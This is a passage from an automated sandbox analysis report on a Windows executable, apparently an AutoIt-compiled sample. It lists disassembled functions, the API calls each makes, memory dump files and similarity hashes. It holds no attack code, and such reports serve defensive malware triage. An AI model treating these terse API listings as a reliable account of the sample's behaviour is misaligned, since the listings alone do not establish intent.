                                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 2027346449-0
                                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                      Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • GetMenu.USER32 ref: 0047A703
                                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                      • _wcslen.LIBCMT ref: 0047A79E
                                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                      • String ID:
                                                      • API String ID: 3257027151-0
                                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                      Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastselect
                                                      • String ID:
                                                      • API String ID: 215497628-0
                                                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                      Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 0044443B
                                                      • GetKeyboardState.USER32(?), ref: 00444450
                                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                      Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00444633
                                                      • GetKeyboardState.USER32(?), ref: 00444648
                                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                      Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                      • API String ID: 1729044348-3025626884
                                                      • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                      • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                      • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                      • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                      Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                      • String ID:
                                                      • API String ID: 2354583917-0
                                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                      Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                      Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                      • String ID:
                                                      • API String ID: 896007046-0
                                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                      Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                      • GetFocus.USER32 ref: 00448ACF
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                      • String ID:
                                                      • API String ID: 3429747543-0
                                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                      Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                      • __swprintf.LIBCMT ref: 0045D4E9
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu$\VH
                                                      • API String ID: 3164766367-2432546070
                                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                      Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 3850602802-3636473452
                                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                      Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                      • String ID:
                                                      • API String ID: 3985565216-0
                                                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                      Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0041F707
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • _free.LIBCMT ref: 0041F71A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free_malloc
                                                      • String ID: [B
                                                      • API String ID: 1020059152-632041663
                                                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                      Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                      • __calloc_crt.LIBCMT ref: 00413DB0
                                                      • __getptd.LIBCMT ref: 00413DBD
                                                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                      • _free.LIBCMT ref: 00413E07
                                                      • __dosmaperr.LIBCMT ref: 00413E12
                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
